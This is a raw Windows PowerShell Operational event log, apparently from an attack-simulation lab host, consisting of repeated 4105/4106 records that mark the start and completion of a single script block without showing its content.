Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473308
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473307
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473306
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473305
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473304
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473303
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473302
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473301
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473300
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473299
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473298
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473297
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473296
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473295
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473294
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473293
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473292
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473291
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473290
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473289
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473288
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473287
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473286
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473285
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473284
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473283
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473282
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473281
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473280
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473279
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473278
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473277
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473276
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473275
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473274
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473273
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473272
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473271
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473270
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473269
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473268
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473267
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473266
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473265
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473264
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473263
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473262
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473261
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473260
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473259
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473258
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473257
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473256
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473255
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473254
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
